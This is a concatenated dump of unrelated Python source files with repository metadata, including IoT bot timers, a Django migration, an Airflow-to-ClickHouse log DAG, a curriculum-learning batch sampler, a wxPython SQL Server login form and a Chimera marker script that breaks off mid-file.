def set_location_intelligence_alarm(botengine, timestamp_ms, intelligence_id, argument, reference):
"""
Set an absolute location intelligence alarm
:param botengine: BotEngine environment
:param timestamp: Absolute timestamp in milliseconds at which to trigger this alarm
:param intelligence_id: ID of the intelligence module to trigger when this alarm fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">set_location_intelligence_alarm({})".format(timestamp_ms))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.set_alarm(int(timestamp_ms), _location_intelligence_fired, (intelligence_id, argument), reference)
def cancel_location_intelligence_timers(botengine, reference):
"""
Cancel all location intelligence timers and alarms with the given reference
:param botengine: BotEngine environment
:param reference: Unique reference name for which to cancel all timers and alarms
"""
botengine.cancel_timers(reference)
def is_location_timer_running(botengine, reference):
"""
Determine if the timer with the given reference is running
:param botengine: BotEngine environment
:param reference: Unique reference name for the timer
:return: True if the timer is running
"""
return botengine.is_timer_running(reference)
#===============================================================================
# Device Intelligence Timers
#===============================================================================
def _device_intelligence_fired(botengine, argument_tuple):
"""
Entry point into this bot
Device intelligence timer or alarm fired
:param botengine: BotEngine Environment
:param argument_tuple: (intelligence_id, argument)
"""
botengine.get_logger().info("\n\nTRIGGER : _device_intelligence_fired()")
controller = load_controller(botengine)
controller.run_device_intelligence(botengine, argument_tuple[0], argument_tuple[1])
botengine.save_variable("controller", controller, required_for_each_execution=True)
botengine.get_logger().info("<< bot (device timer)")
def start_device_intelligence_timer(botengine, seconds, intelligence_id, argument, reference):
"""
Start a relative device intelligence timer
:param botengine: BotEngine environment
:param seconds: Seconds from the start of the current execution to make this timer fire
:param intelligence_id: ID of the intelligence module to trigger when this timer fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">start_device_intelligence_timer({}, {})".format(seconds, reference))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.start_timer_s(int(seconds), _device_intelligence_fired, (intelligence_id, argument), reference)
def start_device_intelligence_timer_ms(botengine, milliseconds, intelligence_id, argument, reference):
"""
Start a relative device intelligence timer
:param botengine: BotEngine environment
:param milliseconds: Milliseconds from the start of the current execution to make this timer fire
:param intelligence_id: ID of the intelligence module to trigger when this timer fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">start_device_intelligence_timer_ms({}, {})".format(milliseconds, reference))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.start_timer_ms(int(milliseconds), _device_intelligence_fired, (intelligence_id, argument), reference)
def set_device_intelligence_alarm(botengine, timestamp_ms, intelligence_id, argument, reference):
"""
Set an absolute device intelligence alarm
:param botengine: BotEngine environment
:param timestamp: Absolute timestamp in milliseconds at which to trigger this alarm
:param intelligence_id: ID of the intelligence module to trigger when this alarm fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">set_device_intelligence_alarm({})".format(timestamp_ms))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.set_alarm(int(timestamp_ms), _device_intelligence_fired, (intelligence_id, argument), reference)
def cancel_device_intelligence_timers(botengine, reference):
"""
Cancel all device intelligence timers and alarms with the given reference
:param botengine: BotEngine environment
:param reference: Unique reference name for which to cancel all timers and alarms
"""
botengine.cancel_timers(reference)
def is_device_timer_running(botengine, reference):
"""
Determine if the timer with the given reference is running
:param botengine: BotEngine environment
:param reference: Unique reference name for the timer
:return: True if the timer is running
"""
return botengine.is_timer_running(reference) | [
"[email protected]"
] | |
3a63330cca430681d8d4b604fd35a7e14fa86b32 | 34992e5eb6e3fe59315e6aa3c3d563a1a322951c | /api/migrations/0001_initial.py | f5d0abaed9dbc25f6715edb9f8c41e72e836851b | [] | no_license | momoru-kun/2skin | c997887c4e8556fae1dfbdbf4d84c8f6ae7fb2ea | 7844016c2ab671224993f606c6760233670df2a2 | refs/heads/main | 2023-05-21T15:47:42.428970 | 2021-05-28T08:52:06 | 2021-05-28T08:52:06 | 375,754,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 853 | py | # Generated by Django 3.2.3 on 2021-05-27 11:35
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Position',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128)),
('price', models.IntegerField()),
                ('category', models.CharField(choices=[('FL', 'Цветы'), ('DO', 'Веснушки'), ('WO', 'Слова'), ('AN', 'Животные'), ('OT', 'Другое'), ('ON', 'Однушки'), ('SE', 'Наборы')], max_length=2)),  # Russian display labels, roughly: Flowers, Freckles, Words, Animals, Other, One-offs, Sets
('image', models.FileField(upload_to='images/')),
],
),
]
| [
"[email protected]"
] | |
dd866df1302e2e8618f647e6c5e184141ed4737e | fbe3c6c0ee455716585b3690c53f91e118d9a913 | /site_cfg_template.py | 5bdacb0e4eb1b6ab1eddc6c4b5d0debce12f801a | [
"BSD-3-Clause"
] | permissive | ramosapf/gensei | 904039e335825f31ffe92acd5337b19939af15b7 | 8a8be511b545e1618a3140295a564b09001e095e | refs/heads/master | 2020-12-11T09:15:01.447737 | 2010-04-16T10:35:18 | 2010-04-16T10:35:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | ##
# Template file for site configuration - copy it to site_cfg.py:
# $ cp site_cfg_template.py site_cfg.py
# Sphinx documentation uses numpydoc extension. Set the path here in case it is
# not installed in a standard location.
numpydoc_path = None
| [
"[email protected]"
] | |
ec6dba479fe913a3b5a74210efcd078e598c792c | cdb9bbf3bd7ad65f919fb689c0a13061042092d6 | /flask_twisted/resource.py | e7b46a74e85ddc9c3e7f0b8aff9477a878b20243 | [
"MIT"
] | permissive | melakf2/flask-twisted | 0ea8249e56b6d9137d6090d8aca6ccb0340dbaea | 58fb81944d04dacd705aa06d5feb2908ab5aa8b3 | refs/heads/master | 2021-05-09T08:48:31.846498 | 2018-01-23T21:24:04 | 2018-01-23T21:24:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | # -*- coding: utf-8 -*-
from twisted.web.resource import Resource
class WSGIRootResource(Resource):
def __init__(self, wsgiResource, children):
"""
Creates a Twisted Web root resource.
"""
Resource.__init__(self)
self._wsgiResource = wsgiResource
self.children = children
def getChild(self, path, request):
request.prepath.pop()
request.postpath.insert(0, path)
return self._wsgiResource
| [
"[email protected]"
] | |
86b0406e23ec7ec581e60ad1114296041160f983 | f77dd6bc7cdf87f411de1b5b9bdd8e7674d01938 | /11_B.py | c98659a6641ecb9ba955689a9f91eac5351d4fd6 | [] | no_license | tsukasasuwa/ITP1 | cbc6ac05b85bb1b4a0a4b0d5e5a62930dc10e9bc | b3549533283b5dce7e403d663874d5e7441b3585 | refs/heads/master | 2020-06-28T20:34:07.288808 | 2019-09-27T04:27:15 | 2019-09-27T04:27:15 | 200,335,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,513 | py |
# coding: utf-8
# In[5]:
x = list(map(int, input().split()))
num = int(input())
for i in range(num):
q = list(map(int, input().split()))
if q[0]==x[0]:
if q[1]==x[1]:
print(x[2])
elif q[1]==x[2]:
print(x[4])
elif q[1]==x[4]:
print(x[3])
elif q[1]==x[3]:
print(x[1])
elif q[0]==x[1]:
if q[1]==x[0]:
print(x[3])
elif q[1]==x[3]:
print(x[5])
elif q[1]==x[5]:
print(x[2])
elif q[1]==x[2]:
print(x[0])
elif q[0]==x[2]:
if q[1]==x[0]:
print(x[1])
elif q[1]==x[1]:
print(x[5])
elif q[1]==x[5]:
print(x[4])
elif q[1]==x[4]:
print(x[0])
elif q[0]==x[3]:
if q[1]==x[0]:
print(x[4])
elif q[1]==x[4]:
print(x[5])
elif q[1]==x[5]:
print(x[1])
elif q[1]==x[1]:
print(x[0])
elif q[0]==x[4]:
if q[1]==x[0]:
print(x[2])
elif q[1]==x[2]:
print(x[5])
elif q[1]==x[5]:
print(x[3])
elif q[1]==x[3]:
print(x[0])
elif q[0]==x[5]:
if q[1]==x[1]:
print(x[3])
elif q[1]==x[3]:
print(x[4])
elif q[1]==x[4]:
print(x[2])
elif q[1]==x[2]:
print(x[1])
| [
"[email protected]"
] | |
df16de8fde13afb83996076f20f3237465e0c52b | 2871a5c3d1e885ee72332dbd8ff2c015dbcb1200 | /NLP/TD4CL/source/samplers.py | bf3eac88e06fe3dbf3fc7bb10627c4bfd5438f1e | [
"Apache-2.0"
] | permissive | huawei-noah/noah-research | 297476299ad040552e44656541858145de72d141 | 82c49c36b76987a46dec8479793f7cf0150839c6 | refs/heads/master | 2023-08-16T19:29:25.439701 | 2023-08-14T03:11:49 | 2023-08-14T03:11:49 | 272,853,727 | 816 | 171 | null | 2023-09-12T01:28:36 | 2020-06-17T01:53:20 | Python | UTF-8 | Python | false | false | 11,207 | py | # Copyright (C) 2022. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from torch.utils.data import Sampler
from utils import *
import math
from scipy.stats import norm
logger = logging.getLogger(__name__)
class BatchPacingSampler(Sampler):
"""
Custom Sampler to get samples based on an external pacing function
"""
def __init__(self, data, config, metric1=None, metric2=None, batch_size=None, c0=0.01,
total_steps=None, sample=False, selection=None):
# collect metric1 and metric2
self.data = data
self.batch_size = batch_size
scores = np.asarray([d[metric1] for d in data])
if (metric2 is not None) and (metric2 != ''):
self.second_scores = np.asarray([d[metric2] for d in data])
self.percentage = 1.0 if selection is None else selection
logger.info('Sorting data ...')
if metric1 in ['correctness', 'confidence']:
logger.info('Sorting from high to low ...')
indices = np.argsort(np.negative(scores)) # from high to low
print(scores[indices[0]], scores[indices[-1]])
else:
logger.info('Sorting from low to high ...')
indices = np.argsort(scores)
sorted_scores = np.sort(scores)
print(scores[indices[0]], scores[indices[-1]])
# Form batches
logger.info('Forming batches ...')
total_steps = total_steps * config['gradient_accumulation_steps']
self.batches = [[] for _ in range(total_steps)]
for train_step in range(0, total_steps):
current_competence = self.pacing_root(train_step, c0, total_steps)
fraction = int(current_competence * len(data))
selected = indices[:fraction+1]
if sample == 'bias':
weights = self.second_scores[selected]
if len(weights) < batch_size:
take = torch.multinomial(torch.from_numpy(weights), len(weights), False).numpy()
else:
take = torch.multinomial(torch.from_numpy(weights), batch_size, False).numpy()
self.batches[train_step] = selected[take].tolist()
elif sample == 'most':
weights = self.second_scores[selected]
take = np.argsort(weights)[-batch_size:]
self.batches[train_step] = selected[take].tolist()
else:
if len(selected.tolist()) < batch_size:
self.batches[train_step] = random.sample(selected.tolist(), k=len(selected.tolist()))
else:
self.batches[train_step] = random.sample(selected.tolist(), k=batch_size)
if selection:
self.data_selection()
@staticmethod
def pacing_root(step, c0, total_steps, root=2):
"""
Root function
Args:
step: Current step
c0: Initial portion of data, by default equal to 1%
total_steps: Total number of steps
root: Square root, Cubic root, etc
Returns (float): Portion of data to use
"""
return min(1, ((step * ((1 - (c0 ** root)) / total_steps)) + (c0 ** root)) ** (1/root))
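        # Sanity check of the schedule (a sketch): with c0=0.01 and root=2,
        # pacing_root(0, 0.01, 1000) == 0.01 and pacing_root(1000, 0.01, 1000) == 1.0,
        # i.e. training starts on 1% of the sorted data and reaches 100% at total_steps.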
def data_selection(self):
"""
Select a portion of data based on the variability metric
"""
select = math.ceil(self.percentage * len(self.data))
keep_examples = np.argsort(self.second_scores)[-select:] # take the most ambiguous
sections = math.ceil(len(keep_examples) / self.batch_size)
# Do 10 passes over this smaller dataset
for _ in range(0, 10):
ids_select = [keep_examples[i] for i in torch.randperm(len(keep_examples))] # permute/shuffle
lists = [a.tolist() for a in np.array_split(ids_select, sections)]
logger.info(
f'Remaining examples to train: {len(keep_examples)} samples --> {len(lists)} batches formed')
self.batches.extend(lists)
def __iter__(self):
return iter(self.batches[i] for i in range(len(self.batches)))
def __len__(self):
return len(self.batches)
class BatchShardingSampler(Sampler):
"""
Custom Sampler to get samples based on sharding
"""
def __init__(self, data, metric1=None, metric2=None, curric=None, batch_size=None, sample=False, selection=None):
self.data = data
self.batch_size = batch_size
self.percentage = 1.0 if selection is None else selection
self.batches = []
# sort based on metric
logger.info('Sorting data ...')
self.scores = np.asarray([d[metric1] for d in data])
if metric2 is not None:
self.second_scores = np.asarray([d[metric2] for d in data])
if metric1 == 'correctness': # Sort from high to low
self.rev = True
logger.info('Sorting from high to low ...')
else:
self.rev = False
logger.info('Sorting from low to high ...')
# Form batches (train one shard for 1 epoch)
logger.info('Forming batches ...')
if 'one-pass' in curric:
self.one_step()
elif 'baby-step' in curric:
self.baby_step_cumsum()
elif 'annealing' in curric:
self.baby_step_annealing(sample=sample)
else:
print('Wrong curriculum')
exit(0)
if selection:
self.data_selection()
def extend_batches(self, shard_id, available_ins):
"""
Using the available examples: shuffle them and split them into batches
Args:
shard_id (int): Shard ID
available_ins (list): Indices we can use (indexes)
Returns: Extended batch list
"""
sections = math.ceil(len(available_ins) / self.batch_size)
ids_select = [available_ins[i] for i in torch.randperm(len(available_ins))] # permute/shuffle
lists = [a.tolist() for a in np.array_split(ids_select, sections)]
logger.info(f'Shard {shard_id} contains {len(available_ins)} samples --> {len(lists)} batches formed')
self.batches.extend(lists)
def one_step(self):
"""
One-pass: Use only current shard in the current step
"""
unique_shards = list(set(self.scores))
for num, i in enumerate(sorted(unique_shards, reverse=self.rev)):
idx = np.where(self.scores == i)[0].tolist() # elements with correctness == i
self.extend_batches(num, idx)
def baby_step_cumsum(self):
"""
Cumulative Step: Accumulate all previous shard + current in the current phase
"""
unique_shards = list(set(self.scores))
valid_samples = []
for num, i in enumerate(sorted(unique_shards, reverse=self.rev)):
idx = np.where(self.scores == i)[0].tolist() # current shard
valid_samples.extend(idx)
self.extend_batches(num, valid_samples)
def baby_step_annealing(self, sample=False):
"""
Annealing: Select 1/N from each previous shard in the current phase
"""
unique_shards = list(set(self.scores))
seen_shards = [] # list of lists
for num, i in enumerate(sorted(unique_shards, reverse=self.rev)):
valid_samples = []
idx = np.where(self.scores == i)[0].tolist()
seen_shards.append(idx)
if num == 0: # 1st shard
valid_samples.extend(idx)
else:
valid_samples.extend(idx)
if sample == 'bias':
for k, shard in enumerate(seen_shards[:-1]):
select = (math.ceil(len(shard) / len(unique_shards)))
vals = torch.multinomial(torch.from_numpy(self.second_scores[shard]), select, False).numpy()
valid_samples.extend((np.array(shard)[vals]).tolist())
elif sample == 'most':
for k, shard in enumerate(seen_shards[:-1]):
select = (math.ceil(len(shard) / len(unique_shards)))
vals = np.argsort(self.second_scores[shard])[-select:]
valid_samples.extend((np.array(shard)[vals]).tolist())
else:
for k, shard in enumerate(seen_shards[:-1]):
select = (math.ceil(len(shard) / len(unique_shards)))
rand_select = random.sample(shard, k=select)
valid_samples.extend(rand_select)
self.extend_batches(num, valid_samples)
def baby_step_cumsum_random(self):
"""
Same as Baby Step but put random examples inside each shard (sanity check)
"""
unique_shards = list(set(self.scores))
shard_size = []
for num, i in enumerate(sorted(unique_shards, reverse=self.rev)):
idx = np.where(self.scores == i)[0].tolist() # current shard
shard_size.append(len(idx))
indices = np.arange(len(self.scores))
indices = np.random.permutation(indices)
indices = np.split(indices, np.cumsum(shard_size)[:-1])
valid_samples = []
for num, ind in enumerate(indices):
valid_samples.extend(ind.tolist())
self.extend_batches(num, valid_samples)
def data_selection(self):
"""
Select a portion of data based on the variability metric
"""
select = math.ceil(self.percentage * len(self.data))
keep_examples = np.argsort(self.second_scores)[-select:] # take the most ambiguous
sections = math.ceil(len(keep_examples) / self.batch_size)
# Do 10 passes over this smaller dataset
for _ in range(0, 10):
ids_select = [keep_examples[i] for i in torch.randperm(len(keep_examples))] # permute/shuffle
lists = [a.tolist() for a in np.array_split(ids_select, sections)]
logger.info(
f'Remaining examples to train: {len(keep_examples)} samples --> {len(lists)} batches formed')
self.batches.extend(lists)
def __iter__(self):
return iter(self.batches[i] for i in range(len(self.batches)))
def __len__(self):
return len(self.batches)
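# Minimal usage sketch (illustrative -- the dataset, metric names and batch
# size below are assumptions, not part of this file):
#
#   sampler = BatchPacingSampler(train_data, config, metric1='confidence',
#                                metric2='variability', batch_size=32,
#                                c0=0.01, total_steps=10000)
#   loader = torch.utils.data.DataLoader(train_data, batch_sampler=sampler)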
| [
"[email protected]"
] | |
53301a5116e33fea984ff880ca09ade5f496c85a | 071fa14cc6de2e8f1dd738143364fcd5e1a7ba44 | /dags/clickhouseLogging.py | 38ea68dc0b01e4693e98e9fd2eabb418375ea537 | [] | no_license | UrcaDeLima/tmpAirflow | 1f35a542afeae54ef1ad619a4c53ea07ffe30afb | 7f8d70707412bf636dfc68dc34b55ac05b61c566 | refs/heads/master | 2023-03-20T10:47:09.040207 | 2021-03-10T08:58:23 | 2021-03-10T08:58:23 | 344,136,563 | 0 | 0 | null | 2021-03-10T09:05:00 | 2021-03-03T13:29:58 | Python | UTF-8 | Python | false | false | 1,482 | py | from datetime import datetime, timedelta
from airflow import DAG
from airflow.hooks.postgres_hook import PostgresHook
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from clickhouse_driver.client import Client
import os
from dotenv import load_dotenv
load_dotenv()
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': datetime(2021, 3, 9),
'retries': 3,
'retry_delay': timedelta(minutes=1),
}
def get_activated_sources():
DB_HOST = os.getenv('DB_HOST')
PATH_LOG_FILE = os.getenv('PATH_LOG_FILE')
client = Client(f'{DB_HOST}')
print(client.execute("DROP TABLE IF EXISTS admin_backend_logs.logs"))
os.system(f'time clickhouse-client --query="INSERT INTO admin_backend_logs.logs_tmp FORMAT CSV" < {PATH_LOG_FILE}')
print(client.execute("CREATE TABLE admin_backend_logs.logs ENGINE = ReplacingMergeTree(day, (date), 8192) AS SELECT DISTINCT toDate(date) AS day, date, method, originalUrl, statusCode, contentType, userAgent, ip, userId FROM admin_backend_logs.logs_tmp;"))
return 1
with DAG('admin_backend_logs_dag',
default_args=default_args,
schedule_interval=timedelta (days = 1),
catchup=False) as dag:
start_task = DummyOperator(task_id='start_task')
discharge_task = PythonOperator(task_id='discharge_task', python_callable=get_activated_sources)
start_task >> discharge_task | [
"[email protected]"
] | |
ca34b119da814e13ade74c3a97267f176517ebd1 | 9c342cc31c1591cc9005a29f83ce742fe56143f1 | /LinkStone.py | 0a9ff7bb0c461f8a5ca788354b9a68c758b02986 | [] | no_license | Winsy412/LinkStoneManager | c5236a7f755a633d63ea3b7988aa3249121467f4 | 7f39202c0b4f3bec42c9b89c91b7887d8adc4333 | refs/heads/master | 2022-03-30T06:07:54.235232 | 2019-12-31T08:58:20 | 2019-12-31T08:58:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,517 | py | #coding=utf-8
import LinkStoneLogin
import wx
import os
import pymssql
import win32api, win32gui
class LoginFrame(LinkStoneLogin.MyFrame1):
def __init__(self,parent):
LinkStoneLogin.MyFrame1.__init__(self,parent)
def check_login(self,event):
Login_user=self.User_text.GetValue()
Login_password=self.Password_text.GetValue()
with open('Config.Painter','w') as f:
f.write(Login_user)
f.write('#')
f.write(Login_password)
f.close()
#print(Login_user,Login_password)
user=[]
pawd=[]
connect = pymssql.connect('(local)','sa','123456','LinkStone')
cursor=connect.cursor()
cursor.execute("select * from PermissionBy")
row=cursor.fetchone()
while row:
#print('%s\t%s'%(row[0],row[1]))
user.append(row[0].strip())
pawd.append(row[1].strip())
row=cursor.fetchone()
if Login_user in user and Login_password in pawd:
cursor.execute("select Permission from Permissionlist where StudentNo='%s'"%(Login_user))
row=cursor.fetchone()
if '3' in str(row[0]).strip():
os.system('start python LinkStoneGSPanal.py')
if '1' in str(row[0]).strip():
os.system('start python LinkStonePermissonPanal.py')
if '2' in str(row[0]).strip():
os.system('start python LinkStonePermissonPanal.py')
if '4' in str(row[0]).strip():
os.system('start python LinkStoneSign.py')
#os.system('start calc')
#print(str(row[0]).strip())
cursor.close()
connect.close()
exit()
else:
os.system('start python LinkStoneDig.py')
cursor.close()
connect.close()
def Check_Password(self,event):
with open('Config.Painter','r') as f:
readlines=f.readlines()
#for readline in readlines:
readline=readlines[0].split('#')
self.User_text.SetValue(readline[0])
self.Password_text.SetValue(readline[1])
def main():
ct = win32api.GetConsoleTitle()
hd = win32gui.FindWindow(0,ct)
win32gui.ShowWindow(hd,0)
app = wx.App(False)
frame = LoginFrame(None)
frame.Show(True)
app.MainLoop()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
4c3bbcd729bb5036ba4a526f3f0df9ef9e40bbc2 | a0826ddc42f4b507f3936f030774cfcd17dcdcbd | /networking/socket client.py | 26a2cb9ce818dad5d4698276dfed0b48f407bcd2 | [] | no_license | gurunadh4b/python_pat | d34f1548d27fe5bd5d90e3942696bd39753be49f | 7118119e0fdda4863ae659d9db505762ca1b9ee9 | refs/heads/master | 2020-03-07T10:23:11.665292 | 2018-03-30T14:59:21 | 2018-03-30T14:59:21 | 127,430,403 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | import socket
s=socket.socket()
print('starting client...')
print('connection to the server')
s.connect((localhost,2000))
while True:
msg=eval(input('enter your message to server :'))
s.send(msg)
res=s.recv(1025)
print(res)
if res=='bye':
s.send('Thank you')
break
s.close()
| [
"[email protected]"
] | |
8d2c5727f6def127133d45a142686b6329b53bec | 61b81cd77cb4916262d046731edf137b919e56a8 | /baike_spider/html_parser.py | bdfc23bede46569548f68d8ed2ac40cf58ff4790 | [] | no_license | thankinglove/python_study | cd94f4d585b75abb1c88d111dbfe50fe49984989 | 875697fb0fe2edc0517297608299dc58c1d3aa1f | refs/heads/master | 2022-11-20T02:07:00.854649 | 2019-03-13T09:40:27 | 2019-03-13T09:40:27 | 150,699,215 | 0 | 1 | null | 2022-10-27T07:42:05 | 2018-09-28T07:01:56 | Python | UTF-8 | Python | false | false | 1,245 | py | import re
from bs4 import BeautifulSoup
from urllib import parse
class HtmlParser(object):
def parse(self, page_url, html_cont):
if page_url is None or html_cont is None:
return
soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
new_urls = self._get_new_urls(page_url, soup)
new_data = self._get_new_data(page_url, soup)
return new_urls, new_data
def _get_new_urls(self, page_url, soup):
new_urls = set()
links = soup.find_all('a', href=re.compile(r'/view/\d+\.htm'))
for link in links:
new_url = link['href']
new_full_url = parse.urljoin(page_url, new_url)
new_urls.add(new_full_url)
return new_urls
def _get_new_data(self, page_url, soup):
res_data = {}
# url
res_data['url'] = page_url
# <dd class="lemmaWgt-lemmaTitle-title"> <h1>Python</h1>
title_node = soup.find('dd', class_='lemmaWgt-lemmaTitle-title').find('h1')
res_data['title'] = title_node.get_text()
# <div class="lemma-summary">
summary_node = soup.find('div', class_='lemma-summary')
res_data['summary'] = title_node.get_text()
return res_data | [
"[email protected]"
] | |
d1088c25c093a855db9e97853b75ee2340976eb5 | 0450bc5a23c60c74ae33216690c649cf86e5edaa | /exp/visual/visual_ice_density/visual_ic0_grid.py | edd073928c619c0c54085b4c6fc4d4fb4c65e8bf | [] | no_license | whiteking64/thesis | 4e66939bafcafb5a1486edcbdfad5c81d88c91b7 | f8fd58c1695bdd56bc15265147f6d940e9b3fbbd | refs/heads/master | 2021-09-06T20:32:53.050720 | 2018-02-11T07:32:03 | 2018-02-11T07:32:03 | 109,417,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 992 | py | import numpy as np
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import pandas as pd
coverage = np.array([[45.0,35.64],[-45.0,35.64],[135.0,35.64],[-135.0,35.64]])
#############################################################################
m = Basemap(lon_0=180,boundinglat=40,
resolution='l',projection='npstere')
fig=plt.figure(figsize=(10,10))
#m.drawmapboundary(fill_color='aqua')
#m.fillcontinents(color='#cc9955', lake_color='aqua', zorder = 0)
m.drawcoastlines(color = '0.15')
lons = coverage[:,0]
lats = coverage[:,1]
#lons,latの段階で何度ずらして作成するのもあり
x,y = m(lons,lats)
"""
x: [ 1315178.9078919 10568199.85683821 1315178.90789189 10568199.8568382 ]
y: [ 10568199.8568382 10568199.85683819 1315178.90789189 1315178.90789189]
"""
x = np.linspace(min(x), max(x), 900)
y = np.linspace(min(y), max(y), 900)
#x,y = np.meshgrid(x, y)
x = x[:]
y = y[:3]
m.plot(x,y,'bo', markersize=10)
plt.show()
| [
"[email protected]"
] | |
42b9ce1858b8ef0c192bd4d772573a470f2f912f | 711756b796d68035dc6a39060515200d1d37a274 | /output_exocyst/optimized_43734.py | f21d43dcee9c4cba778a9cac9856ff5e9f0ec399 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,505 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Sec3_GFPN" not in marker_sets:
s=new_marker_set('Sec3_GFPN')
marker_sets["Sec3_GFPN"]=s
s= marker_sets["Sec3_GFPN"]
mark=s.place_marker((452.25, 542.286, 492.08), (0.15, 0.4, 0.6), 18.4716)
if "Sec3_0" not in marker_sets:
s=new_marker_set('Sec3_0')
marker_sets["Sec3_0"]=s
s= marker_sets["Sec3_0"]
mark=s.place_marker((469.268, 535.563, 514.149), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_1" not in marker_sets:
s=new_marker_set('Sec3_1')
marker_sets["Sec3_1"]=s
s= marker_sets["Sec3_1"]
mark=s.place_marker((498.823, 524.952, 516.224), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_2" not in marker_sets:
s=new_marker_set('Sec3_2')
marker_sets["Sec3_2"]=s
s= marker_sets["Sec3_2"]
mark=s.place_marker((503.123, 499.822, 497.789), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_3" not in marker_sets:
s=new_marker_set('Sec3_3')
marker_sets["Sec3_3"]=s
s= marker_sets["Sec3_3"]
mark=s.place_marker((488.774, 476.446, 491.572), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_4" not in marker_sets:
s=new_marker_set('Sec3_4')
marker_sets["Sec3_4"]=s
s= marker_sets["Sec3_4"]
mark=s.place_marker((464.14, 462.995, 493.548), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_5" not in marker_sets:
s=new_marker_set('Sec3_5')
marker_sets["Sec3_5"]=s
s= marker_sets["Sec3_5"]
mark=s.place_marker((453.708, 439.825, 505.604), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_6" not in marker_sets:
s=new_marker_set('Sec3_6')
marker_sets["Sec3_6"]=s
s= marker_sets["Sec3_6"]
mark=s.place_marker((459.656, 412.369, 506.82), (0.21, 0.49, 0.72), 17.1475)
if "Sec3_GFPC" not in marker_sets:
s=new_marker_set('Sec3_GFPC')
marker_sets["Sec3_GFPC"]=s
s= marker_sets["Sec3_GFPC"]
mark=s.place_marker((422.307, 518.031, 526.873), (0.3, 0.6, 0.8), 18.4716)
if "Sec3_Anch" not in marker_sets:
s=new_marker_set('Sec3_Anch')
marker_sets["Sec3_Anch"]=s
s= marker_sets["Sec3_Anch"]
mark=s.place_marker((497.009, 306.663, 486.71), (0.3, 0.6, 0.8), 18.4716)
if "Sec5_GFPN" not in marker_sets:
s=new_marker_set('Sec5_GFPN')
marker_sets["Sec5_GFPN"]=s
s= marker_sets["Sec5_GFPN"]
mark=s.place_marker((483.096, 528.551, 497.237), (0.5, 0.3, 0.6), 18.4716)
if "Sec5_0" not in marker_sets:
s=new_marker_set('Sec5_0')
marker_sets["Sec5_0"]=s
s= marker_sets["Sec5_0"]
mark=s.place_marker((487.368, 533.617, 485.125), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_1" not in marker_sets:
s=new_marker_set('Sec5_1')
marker_sets["Sec5_1"]=s
s= marker_sets["Sec5_1"]
mark=s.place_marker((500.717, 516.161, 467.604), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_2" not in marker_sets:
s=new_marker_set('Sec5_2')
marker_sets["Sec5_2"]=s
s= marker_sets["Sec5_2"]
mark=s.place_marker((495.377, 489.575, 460.231), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_3" not in marker_sets:
s=new_marker_set('Sec5_3')
marker_sets["Sec5_3"]=s
s= marker_sets["Sec5_3"]
mark=s.place_marker((471.827, 474.336, 461.835), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_4" not in marker_sets:
s=new_marker_set('Sec5_4')
marker_sets["Sec5_4"]=s
s= marker_sets["Sec5_4"]
mark=s.place_marker((445.147, 466.008, 464.791), (0.6, 0.31, 0.64), 17.1475)
if "Sec5_5" not in marker_sets:
s=new_marker_set('Sec5_5')
marker_sets["Sec5_5"]=s
s= marker_sets["Sec5_5"]
